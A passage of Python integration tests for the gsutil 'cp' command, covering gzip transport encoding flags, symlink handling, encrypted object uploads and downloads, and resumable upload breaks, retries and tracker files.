self.assertEqual(f.read(), contents)
@SkipForS3('No compressed transport encoding support for S3.')
@SkipForXML('No compressed transport encoding support for the XML API.')
@SequentialAndParallelTransfer
def test_gzip_transport_encoded_upload_and_download(self):
"""Test gzip encoded files upload correctly.
This checks that files are not tagged with a gzip content encoding and
that the contents of the files are uncompressed in GCS. This test uses the
-j flag to target specific extensions.
"""
def _create_test_data(): # pylint: disable=invalid-name
"""Setup the bucket and local data to test with.
Returns:
Triplet containing the following values:
bucket_uri: String URI of cloud storage bucket to upload mock data
to.
tmpdir: String, path of a temporary directory to write mock data to.
local_uris: Tuple of three strings; each is the file path to a file
containing mock data.
"""
bucket_uri = self.CreateBucket()
contents = b'x' * 10000
tmpdir = self.CreateTempDir()
local_uris = []
for filename in ('test.html', 'test.js', 'test.txt'):
local_uris.append(
self.CreateTempFile(file_name=filename,
tmpdir=tmpdir,
contents=contents))
return (bucket_uri, tmpdir, local_uris)
def _upload_test_data(tmpdir, bucket_uri): # pylint: disable=invalid-name
"""Upload local test data.
Args:
tmpdir: String, path of a temporary directory to write mock data to.
bucket_uri: String URI of cloud storage bucket to upload mock data to.
Returns:
stderr: String output from running the gsutil command to upload mock
data.
"""
stderr = self.RunGsUtil([
'-D', 'cp', '-j', 'js, html',
os.path.join(tmpdir, 'test*'),
suri(bucket_uri)
],
return_stderr=True)
self.AssertNObjectsInBucket(bucket_uri, 3)
return stderr
def _assert_sent_compressed(local_uris, stderr): # pylint: disable=invalid-name
"""Ensure the correct files were marked for compression.
Args:
local_uris: Tuple of three strings; each is the file path to a file
containing mock data.
stderr: String output from running the gsutil command to upload mock
data.
"""
local_uri_html, local_uri_js, local_uri_txt = local_uris
assert_base_string = 'Using compressed transport encoding for file://{}.'
self.assertIn(assert_base_string.format(local_uri_html), stderr)
self.assertIn(assert_base_string.format(local_uri_js), stderr)
self.assertNotIn(assert_base_string.format(local_uri_txt), stderr)
def _assert_stored_uncompressed(bucket_uri, contents=b'x' * 10000): # pylint: disable=invalid-name
"""Ensure the files are not compressed when they are stored in the bucket.
Args:
bucket_uri: String with URI for bucket containing uploaded test data.
contents: Byte string that are stored in each file in the bucket.
"""
local_uri_html = suri(bucket_uri, 'test.html')
local_uri_js = suri(bucket_uri, 'test.js')
local_uri_txt = suri(bucket_uri, 'test.txt')
fpath4 = self.CreateTempFile()
for uri in (local_uri_html, local_uri_js, local_uri_txt):
stdout = self.RunGsUtil(['stat', uri], return_stdout=True)
self.assertNotRegex(stdout, r'Content-Encoding:\s+gzip')
self.RunGsUtil(['cp', uri, suri(fpath4)])
with open(fpath4, 'rb') as f:
self.assertEqual(f.read(), contents)
# Get mock data, run tests
bucket_uri, tmpdir, local_uris = _create_test_data()
stderr = _upload_test_data(tmpdir, bucket_uri)
_assert_sent_compressed(local_uris, stderr)
_assert_stored_uncompressed(bucket_uri)
@SkipForS3('No compressed transport encoding support for S3.')
@SkipForXML('No compressed transport encoding support for the XML API.')
@SequentialAndParallelTransfer
def test_gzip_transport_encoded_parallel_upload_non_resumable(self):
"""Test non resumable, gzip encoded files upload correctly in parallel.
This test generates a small amount of data (e.g. 100 chars) to upload.
Due to the small size, it will be below the resumable threshold,
and test the behavior of non-resumable uploads.
"""
# Setup the bucket and local data.
bucket_uri = self.CreateBucket()
contents = b'x' * 100
tmpdir = self.CreateTempDir(test_files=10, contents=contents)
# Upload the data.
with SetBotoConfigForTest([('GSUtil', 'resumable_threshold', str(ONE_KIB))
]):
stderr = self.RunGsUtil(
['-D', '-m', 'cp', '-J', '-r', tmpdir,
suri(bucket_uri)],
return_stderr=True)
# Ensure all objects are uploaded.
self.AssertNObjectsInBucket(bucket_uri, 10)
# Ensure the progress logger sees a gzip encoding.
self.assertIn('send: Using gzip transport encoding for the request.',
stderr)
@SkipForS3('No compressed transport encoding support for S3.')
@SkipForXML('No compressed transport encoding support for the XML API.')
@SequentialAndParallelTransfer
def test_gzip_transport_encoded_parallel_upload_resumable(self):
"""Test resumable, gzip encoded files upload correctly in parallel.
This test generates a large amount of data (e.g. halt_size amount of chars)
to upload. Due to the large size, it will be above the resumable threshold,
and test the behavior of resumable uploads.
"""
# Setup the bucket and local data.
bucket_uri = self.CreateBucket()
contents = get_random_ascii_chars(size=self.halt_size)
tmpdir = self.CreateTempDir(test_files=10, contents=contents)
# Upload the data.
with SetBotoConfigForTest([('GSUtil', 'resumable_threshold', str(ONE_KIB))
]):
stderr = self.RunGsUtil(
['-D', '-m', 'cp', '-J', '-r', tmpdir,
suri(bucket_uri)],
return_stderr=True)
# Ensure all objects are uploaded.
self.AssertNObjectsInBucket(bucket_uri, 10)
# Ensure the progress logger sees a gzip encoding.
self.assertIn('send: Using gzip transport encoding for the request.',
stderr)
@SequentialAndParallelTransfer
def test_gzip_all_upload_and_download(self):
bucket_uri = self.CreateBucket()
contents = b'x' * 10000
tmpdir = self.CreateTempDir()
self.CreateTempFile(file_name='test.html', tmpdir=tmpdir, contents=contents)
self.CreateTempFile(file_name='test.js', tmpdir=tmpdir, contents=contents)
self.CreateTempFile(file_name='test.txt', tmpdir=tmpdir, contents=contents)
self.CreateTempFile(file_name='test', tmpdir=tmpdir, contents=contents)
# Test that all files are compressed.
self.RunGsUtil(
['cp', '-Z',
os.path.join(tmpdir, 'test*'),
suri(bucket_uri)])
self.AssertNObjectsInBucket(bucket_uri, 4)
uri1 = suri(bucket_uri, 'test.html')
uri2 = suri(bucket_uri, 'test.js')
uri3 = suri(bucket_uri, 'test.txt')
uri4 = suri(bucket_uri, 'test')
stdout = self.RunGsUtil(['stat', uri1], return_stdout=True)
self.assertRegex(stdout, r'Content-Encoding:\s+gzip')
stdout = self.RunGsUtil(['stat', uri2], return_stdout=True)
self.assertRegex(stdout, r'Content-Encoding:\s+gzip')
stdout = self.RunGsUtil(['stat', uri3], return_stdout=True)
self.assertRegex(stdout, r'Content-Encoding:\s+gzip')
stdout = self.RunGsUtil(['stat', uri4], return_stdout=True)
self.assertRegex(stdout, r'Content-Encoding:\s+gzip')
fpath4 = self.CreateTempFile()
for uri in (uri1, uri2, uri3, uri4):
self.RunGsUtil(['cp', uri, suri(fpath4)])
with open(fpath4, 'rb') as f:
self.assertEqual(f.read(), contents)
@SkipForS3('No compressed transport encoding support for S3.')
@SkipForXML('No compressed transport encoding support for the XML API.')
@SequentialAndParallelTransfer
def test_gzip_transport_encoded_all_upload_and_download(self):
"""Test gzip encoded files upload correctly.
This checks that files are not tagged with a gzip content encoding and
that the contents of the files are uncompressed in GCS. This test uses the
-J flag to target all files.
"""
# Setup the bucket and local data.
bucket_uri = self.CreateBucket()
contents = b'x' * 10000
tmpdir = self.CreateTempDir()
local_uri1 = self.CreateTempFile(file_name='test.txt',
tmpdir=tmpdir,
contents=contents)
local_uri2 = self.CreateTempFile(file_name='test',
tmpdir=tmpdir,
contents=contents)
# Upload the data.
stderr = self.RunGsUtil(
['-D', 'cp', '-J',
os.path.join(tmpdir, 'test*'),
suri(bucket_uri)],
return_stderr=True)
self.AssertNObjectsInBucket(bucket_uri, 2)
# Ensure the correct files were marked for compression.
self.assertIn(
'Using compressed transport encoding for file://%s.' % (local_uri1),
stderr)
self.assertIn(
'Using compressed transport encoding for file://%s.' % (local_uri2),
stderr)
# Ensure the progress logger sees a gzip encoding.
self.assertIn('send: Using gzip transport encoding for the request.',
stderr)
# Ensure the files do not have a stored encoding of gzip and are stored
# uncompressed.
remote_uri1 = suri(bucket_uri, 'test.txt')
remote_uri2 = suri(bucket_uri, 'test')
fpath4 = self.CreateTempFile()
for uri in (remote_uri1, remote_uri2):
stdout = self.RunGsUtil(['stat', uri], return_stdout=True)
self.assertNotRegex(stdout, r'Content-Encoding:\s+gzip')
self.RunGsUtil(['cp', uri, suri(fpath4)])
with open(fpath4, 'rb') as f:
self.assertEqual(f.read(), contents)
def test_both_gzip_options_error(self):
"""Test that mixing compression flags error."""
cases = (
# Test with -Z and -z
['cp', '-Z', '-z', 'html, js', 'a.js', 'b.js'],
# Same test, but with arguments in the opposite order.
['cp', '-z', 'html, js', '-Z', 'a.js', 'b.js'])
for case in cases:
stderr = self.RunGsUtil(case, return_stderr=True, expected_status=1)
self.assertIn('CommandException', stderr)
self.assertIn(
'Specifying both the -z and -Z options together is invalid.', stderr)
def test_both_gzip_transport_encoding_options_error(self):
"""Test that mixing transport encoding flags error."""
cases = (
# Test with -J and -j
['cp', '-J', '-j', 'html, js', 'a.js', 'b.js'],
# Same test, but with arguments in the opposite order.
['cp', '-j', 'html, js', '-J', 'a.js', 'b.js'])
for case in cases:
stderr = self.RunGsUtil(case, return_stderr=True, expected_status=1)
self.assertIn('CommandException', stderr)
self.assertIn(
'Specifying both the -j and -J options together is invalid.', stderr)
def test_combined_gzip_options_error(self):
"""Test that mixing transport encoding and compression flags error."""
cases = (['cp', '-Z', '-j', 'html, js', 'a.js',
'b.js'], ['cp', '-J', '-z', 'html, js', 'a.js',
'b.js'], ['cp', '-j', 'html, js', '-Z', 'a.js', 'b.js'],
['cp', '-z', 'html, js', '-J', 'a.js', 'b.js'])
for case in cases:
stderr = self.RunGsUtil(case, return_stderr=True, expected_status=1)
self.assertIn('CommandException', stderr)
self.assertIn(
'Specifying both the -j/-J and -z/-Z options together is invalid.',
stderr)
def test_upload_with_subdir_and_unexpanded_wildcard(self):
fpath1 = self.CreateTempFile(file_name=('tmp', 'x', 'y', 'z'))
bucket_uri = self.CreateBucket()
wildcard_uri = '%s*' % fpath1[:-5]
stderr = self.RunGsUtil(
['cp', '-R', wildcard_uri, suri(bucket_uri)], return_stderr=True)
self.assertIn('Copying file:', stderr)
self.AssertNObjectsInBucket(bucket_uri, 1)
def test_upload_does_not_raise_with_content_md5_and_check_hashes_never(self):
fpath1 = self.CreateTempFile(file_name=('foo'))
bucket_uri = self.CreateBucket()
with SetBotoConfigForTest([('GSUtil', 'check_hashes', 'never')]):
stderr = self.RunGsUtil(
['-h', 'Content-MD5: invalid-md5', 'cp', fpath1,
suri(bucket_uri)],
return_stderr=True)
self.assertIn('Copying file:', stderr)
self.AssertNObjectsInBucket(bucket_uri, 1)
@SequentialAndParallelTransfer
def test_cp_object_ending_with_slash(self):
"""Tests that cp works with object names ending with slash."""
tmpdir = self.CreateTempDir()
bucket_uri = self.CreateBucket()
self.CreateObject(bucket_uri=bucket_uri,
object_name='abc/',
contents=b'dir')
self.CreateObject(bucket_uri=bucket_uri,
object_name='abc/def',
contents=b'def')
self.AssertNObjectsInBucket(bucket_uri, 2)
self.RunGsUtil(['cp', '-R', suri(bucket_uri), tmpdir])
# Check that files in the subdir got copied even though subdir object
# download was skipped.
with open(os.path.join(tmpdir, bucket_uri.bucket_name, 'abc', 'def')) as f:
self.assertEquals('def', '\n'.join(f.readlines()))
def test_cp_without_read_access(self):
"""Tests that cp fails without read access to the object."""
# TODO: With 401's triggering retries in apitools, this test will take
# a long time. Ideally, make apitools accept a num_retries config for this
# until we stop retrying the 401's.
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'foo')
# Use @Retry as hedge against bucket listing eventual consistency.
self.AssertNObjectsInBucket(bucket_uri, 1)
if self.default_provider == 's3':
expected_error_regex = r'AccessDenied'
else:
expected_error_regex = r'Anonymous \S+ do(es)? not have'
with self.SetAnonymousBotoCreds():
stderr = self.RunGsUtil(['cp', suri(object_uri), 'foo'],
return_stderr=True,
expected_status=1)
self.assertRegex(stderr, expected_error_regex)
@unittest.skipIf(IS_WINDOWS, 'os.symlink() is not available on Windows.')
def test_cp_minus_r_minus_e(self):
"""Tests that cp -e -r ignores symlinks when recursing."""
bucket_uri = self.CreateBucket()
tmpdir = self.CreateTempDir()
# Create a valid file, since cp expects to copy at least one source URL
# successfully.
self.CreateTempFile(tmpdir=tmpdir, contents=b'foo')
subdir = os.path.join(tmpdir, 'subdir')
os.mkdir(subdir)
os.mkdir(os.path.join(tmpdir, 'missing'))
# Create a blank directory that is a broken symlink to ensure that we
# don't fail recursive enumeration with a bad symlink.
os.symlink(os.path.join(tmpdir, 'missing'), os.path.join(subdir, 'missing'))
os.rmdir(os.path.join(tmpdir, 'missing'))
self.RunGsUtil(['cp', '-r', '-e', tmpdir, suri(bucket_uri)])
@unittest.skipIf(IS_WINDOWS, 'os.symlink() is not available on Windows.')
def test_cp_minus_e(self):
fpath_dir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=fpath_dir)
fpath2 = os.path.join(fpath_dir, 'cp_minus_e')
bucket_uri = self.CreateBucket()
os.symlink(fpath1, fpath2)
# We also use -c to continue on errors. One of the expanded glob entries
# should be the symlinked file, which should throw a CommandException since
# no valid (non-symlinked) files could be found at that path; we don't want
# the command to terminate if that's the first file we attempt to copy.
stderr = self.RunGsUtil([
'cp', '-e', '-c',
'%s%s*' % (fpath_dir, os.path.sep),
suri(bucket_uri, 'files')
],
return_stderr=True)
self.assertIn('Copying file', stderr)
self.assertIn('Skipping symbolic link', stderr)
# Ensure that top-level arguments are ignored if they are symlinks. The file
# at fpath1 should be successfully copied, then copying the symlink at
# fpath2 should fail.
stderr = self.RunGsUtil(
['cp', '-e', '-r', fpath1, fpath2,
suri(bucket_uri, 'files')],
return_stderr=True,
expected_status=1)
self.assertIn('Copying file', stderr)
self.assertIn('Skipping symbolic link', stderr)
self.assertIn('CommandException: No URLs matched: %s' % fpath2, stderr)
def test_cp_multithreaded_wildcard(self):
"""Tests that cp -m works with a wildcard."""
num_test_files = 5
tmp_dir = self.CreateTempDir(test_files=num_test_files)
bucket_uri = self.CreateBucket()
wildcard_uri = '%s%s*' % (tmp_dir, os.sep)
self.RunGsUtil(['-m', 'cp', wildcard_uri, suri(bucket_uri)])
self.AssertNObjectsInBucket(bucket_uri, num_test_files)
@SequentialAndParallelTransfer
def test_cp_duplicate_source_args(self):
"""Tests that cp -m works when a source argument is provided twice."""
object_contents = b'edge'
object_uri = self.CreateObject(object_name='foo', contents=object_contents)
tmp_dir = self.CreateTempDir()
self.RunGsUtil(['-m', 'cp', suri(object_uri), suri(object_uri), tmp_dir])
with open(os.path.join(tmp_dir, 'foo'), 'rb') as in_fp:
contents = in_fp.read()
# Contents should be not duplicated.
self.assertEqual(contents, object_contents)
@SkipForS3('gsutil doesn\'t support S3 customer-supplied encryption keys.')
@SequentialAndParallelTransfer
def test_cp_download_encrypted_object(self):
"""Tests downloading an encrypted object."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
object_contents = b'bar'
object_uri = self.CreateObject(object_name='foo',
contents=object_contents,
encryption_key=TEST_ENCRYPTION_KEY1)
fpath = self.CreateTempFile()
boto_config_for_test = [('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
with SetBotoConfigForTest(boto_config_for_test):
self.RunGsUtil(['cp', suri(object_uri), suri(fpath)])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), object_contents)
# If multiple keys are supplied and one is correct, download should succeed.
fpath2 = self.CreateTempFile()
boto_config_for_test2 = [
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY3),
('GSUtil', 'decryption_key1', TEST_ENCRYPTION_KEY2),
('GSUtil', 'decryption_key2', TEST_ENCRYPTION_KEY1)
]
with SetBotoConfigForTest(boto_config_for_test2):
self.RunGsUtil(['cp', suri(object_uri), suri(fpath2)])
with open(fpath2, 'rb') as f:
self.assertEqual(f.read(), object_contents)
@SkipForS3('gsutil doesn\'t support S3 customer-supplied encryption keys.')
@SequentialAndParallelTransfer
def test_cp_download_encrypted_object_without_key(self):
"""Tests downloading an encrypted object without the necessary key."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
object_contents = b'bar'
object_uri = self.CreateObject(object_name='foo',
contents=object_contents,
encryption_key=TEST_ENCRYPTION_KEY1)
fpath = self.CreateTempFile()
stderr = self.RunGsUtil(
['cp', suri(object_uri), suri(fpath)],
expected_status=1,
return_stderr=True)
self.assertIn(
'Missing decryption key with SHA256 hash %s' %
TEST_ENCRYPTION_KEY1_SHA256_B64, stderr)
@SkipForS3('gsutil doesn\'t support S3 customer-supplied encryption keys.')
@SequentialAndParallelTransfer
def test_cp_upload_encrypted_object(self):
"""Tests uploading an encrypted object."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
object_uri = suri(bucket_uri, 'foo')
file_contents = b'bar'
fpath = self.CreateTempFile(contents=file_contents, file_name='foo')
boto_config_for_test = [('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
# Uploading the object should succeed.
with SetBotoConfigForTest(boto_config_for_test):
self.RunGsUtil(['cp', suri(fpath), suri(bucket_uri)])
self.AssertObjectUsesCSEK(object_uri, TEST_ENCRYPTION_KEY1)
with SetBotoConfigForTest(boto_config_for_test):
# Reading the object back should succeed.
fpath2 = self.CreateTempFile()
self.RunGsUtil(['cp', suri(bucket_uri, 'foo'), suri(fpath2)])
with open(fpath2, 'rb') as f:
self.assertEqual(f.read(), file_contents)
@SkipForS3('No resumable upload or encryption support for S3.')
def test_cp_resumable_upload_encrypted_object_break(self):
"""Tests that an encrypted upload resumes after a connection break."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
object_uri_str = suri(bucket_uri, 'foo')
fpath = self.CreateTempFile(contents=b'a' * self.halt_size)
boto_config_for_test = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath, object_uri_str
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
stderr = self.RunGsUtil(['cp', fpath, object_uri_str], return_stderr=True)
self.assertIn('Resuming upload', stderr)
stdout = self.RunGsUtil(['stat', object_uri_str], return_stdout=True)
with open(fpath, 'rb') as fp:
self.assertIn(CalculateB64EncodedMd5FromContents(fp), stdout)
self.AssertObjectUsesCSEK(object_uri_str, TEST_ENCRYPTION_KEY1)
@SkipForS3('No resumable upload or encryption support for S3.')
def test_cp_resumable_upload_encrypted_object_different_key(self):
"""Tests that an encrypted upload resume uses original encryption key."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
object_uri_str = suri(bucket_uri, 'foo')
file_contents = b'a' * self.halt_size
fpath = self.CreateTempFile(contents=file_contents)
boto_config_for_test = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath, object_uri_str
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
# Resume the upload with multiple keys, including the original.
boto_config_for_test2 = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'decryption_key1',
TEST_ENCRYPTION_KEY2),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
with SetBotoConfigForTest(boto_config_for_test2):
stderr = self.RunGsUtil(['cp', fpath, object_uri_str], return_stderr=True)
self.assertIn('Resuming upload', stderr)
# Object should have the original key.
self.AssertObjectUsesCSEK(object_uri_str, TEST_ENCRYPTION_KEY1)
@SkipForS3('No resumable upload or encryption support for S3.')
def test_cp_resumable_upload_encrypted_object_missing_key(self):
"""Tests that an encrypted upload does not resume without original key."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
object_uri_str = suri(bucket_uri, 'foo')
file_contents = b'a' * self.halt_size
fpath = self.CreateTempFile(contents=file_contents)
boto_config_for_test = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath, object_uri_str
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
# Resume the upload without the original key.
boto_config_for_test2 = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY2)]
with SetBotoConfigForTest(boto_config_for_test2):
stderr = self.RunGsUtil(['cp', fpath, object_uri_str], return_stderr=True)
self.assertNotIn('Resuming upload', stderr)
self.assertIn('does not match current encryption key', stderr)
self.assertIn('Restarting upload from scratch', stderr)
# Object should have the new key.
self.AssertObjectUsesCSEK(object_uri_str, TEST_ENCRYPTION_KEY2)
def _ensure_object_unencrypted(self, object_uri_str):
"""Strongly consistent check that the object is unencrypted."""
stdout = self.RunGsUtil(['stat', object_uri_str], return_stdout=True)
self.assertNotIn('Encryption Key', stdout)
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_break(self):
"""Tests that an upload can be resumed after a connection break."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'a' * self.halt_size)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
return_stderr=True)
self.assertIn('Resuming upload', stderr)
@SkipForS3('No compressed transport encoding support for S3.')
@SkipForXML('No compressed transport encoding support for the XML API.')
@SequentialAndParallelTransfer
def test_cp_resumable_upload_gzip_encoded_break(self):
"""Tests that a gzip encoded upload can be resumed."""
# Setup the bucket and local data. File contents are randomized to prevent
# them from compressing below the resumable-threshold and failing the test.
bucket_uri = self.CreateBucket()
contents = get_random_ascii_chars(size=self.halt_size)
local_uri = self.CreateTempFile(file_name='test.txt', contents=contents)
# Configure boto
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'-D', 'cp', '-J', '--testcallbackfile', test_callback_file, local_uri,
suri(bucket_uri)
],
expected_status=1,
return_stderr=True)
# Ensure the progress logger sees a gzip encoding.
self.assertIn('send: Using gzip transport encoding for the request.',
stderr)
self.assertIn('Artifically halting upload', stderr)
stderr = self.RunGsUtil(['-D', 'cp', '-J', local_uri,
suri(bucket_uri)],
return_stderr=True)
self.assertIn('Resuming upload', stderr)
# Ensure the progress logger is still seeing a gzip encoding.
self.assertIn('send: Using gzip transport encoding for the request.',
stderr)
# Ensure the files do not have a stored encoding of gzip and are stored
# uncompressed.
temp_uri = self.CreateTempFile()
remote_uri = suri(bucket_uri, 'test.txt')
stdout = self.RunGsUtil(['stat', remote_uri], return_stdout=True)
self.assertNotRegex(stdout, r'Content-Encoding:\s+gzip')
self.RunGsUtil(['cp', remote_uri, suri(temp_uri)])
with open(temp_uri, 'rb') as f:
self.assertEqual(f.read(), contents)
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_retry(self):
"""Tests that a resumable upload completes with one retry."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'a' * self.halt_size)
# TODO: Raising an httplib or socket error blocks bucket teardown
# in JSON for 60-120s on a multiprocessing lock acquire. Figure out why;
# until then, raise an apitools retryable exception.
if self.test_api == ApiSelector.XML:
test_callback_file = self.CreateTempFile(contents=pickle.dumps(
_ResumableUploadRetryHandler(5, http_client.BadStatusLine, (
'unused',))))
else:
test_callback_file = self.CreateTempFile(contents=pickle.dumps(
_ResumableUploadRetryHandler(
5, apitools_exceptions.BadStatusCodeError, ('unused', 'unused',
'unused'))))
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'-D', 'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
return_stderr=1)
if self.test_api == ApiSelector.XML:
self.assertIn('Got retryable failure', stderr)
else:
self.assertIn('Retrying', stderr)
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_streaming_upload_retry(self):
"""Tests that a streaming resumable upload completes with one retry."""
if self.test_api == ApiSelector.XML:
return unittest.skip('XML does not support resumable streaming uploads.')
bucket_uri = self.CreateBucket()
test_callback_file = self.CreateTempFile(contents=pickle.dumps(
_ResumableUploadRetryHandler(5, apitools_exceptions.BadStatusCodeError,
('unused', 'unused', 'unused'))))
# Need to reduce the JSON chunk size since streaming uploads buffer a
# full chunk.
boto_configs_for_test = [('GSUtil', 'json_resumable_chunk_size',
str(256 * ONE_KIB)), ('Boto', 'num_retries', '2')]
with SetBotoConfigForTest(boto_configs_for_test):
stderr = self.RunGsUtil([
'-D', 'cp', '--testcallbackfile', test_callback_file, '-',
suri(bucket_uri, 'foo')
],
stdin='a' * 512 * ONE_KIB,
return_stderr=1)
self.assertIn('Retrying', stderr)
@SkipForS3('preserve_acl flag not supported for S3.')
def test_cp_preserve_no_owner(self):
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'foo')
# Anonymous user can read the object and write to the bucket, but does
# not own the object.
self.RunGsUtil(['acl', 'ch', '-u', 'AllUsers:R', suri(object_uri)])
self.RunGsUtil(['acl', 'ch', '-u', 'AllUsers:W', suri(bucket_uri)])
with self.SetAnonymousBotoCreds():
stderr = self.RunGsUtil(
['cp', '-p', suri(object_uri),
suri(bucket_uri, 'foo')],
return_stderr=True,
expected_status=1)
self.assertIn('OWNER permission is required for preserving ACLs', stderr)
@SkipForS3('No resumable upload support for S3.')
def test_cp_progress_callbacks(self):
bucket_uri = self.CreateBucket()
final_size_string = BytesToFixedWidthString(1024**2)
final_progress_callback = final_size_string + '/' + final_size_string
fpath = self.CreateTempFile(contents=b'a' * ONE_MIB, file_name='foo')
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
return_stderr=True)
self.assertEquals(1, stderr.count(final_progress_callback))
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(2 * ONE_MIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
return_stderr=True)
self.assertEquals(1, stderr.count(final_progress_callback))
stderr = self.RunGsUtil(['cp', suri(bucket_uri, 'foo'), fpath],
return_stderr=True)
self.assertEquals(1, stderr.count(final_progress_callback))
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload(self):
"""Tests that a basic resumable upload completes successfully."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'a' * self.halt_size)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
self.RunGsUtil(['cp', fpath, suri(bucket_uri)])
@SkipForS3('No resumable upload support for S3.')
def test_resumable_upload_break_leaves_tracker(self):
"""Tests that a tracker file is created with a resumable upload."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(file_name='foo', contents=b'a' * self.halt_size)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
tracker_filename = GetTrackerFilePath(
StorageUrlFromString(suri(bucket_uri, 'foo')), TrackerFileType.UPLOAD,
self.test_api)
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
try:
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri, 'foo')
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
self.assertTrue(os.path.exists(tracker_filename),
'Tracker file %s not present.' % tracker_filename)
# Test the permissions
if os.name == 'posix':
mode = oct(stat.S_IMODE(os.stat(tracker_filename).st_mode))
# Assert that only user has read/write permission
self.assertEqual(oct(0o600), mode)
finally:
DeleteTrackerFile(tracker_filename)
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_break_file_size_change(self):
"""Tests a resumable upload where the uploaded file changes size.
This should fail when we read the tracker data.
"""
bucket_uri = self.CreateBucket()
tmp_dir = self.CreateTempDir()
fpath = self.CreateTempFile(file_name='foo',
tmpdir=tmp_dir,
contents=b'a' * self.halt_size)
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
fpath = self.CreateTempFile(file_name='foo',
tmpdir=tmp_dir,
contents=b'a' * self.halt_size * 2)
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
expected_status=1,
return_stderr=True)
self.assertIn('ResumableUploadAbortException', stderr)
@SkipForS3('No resumable upload support for S3.')
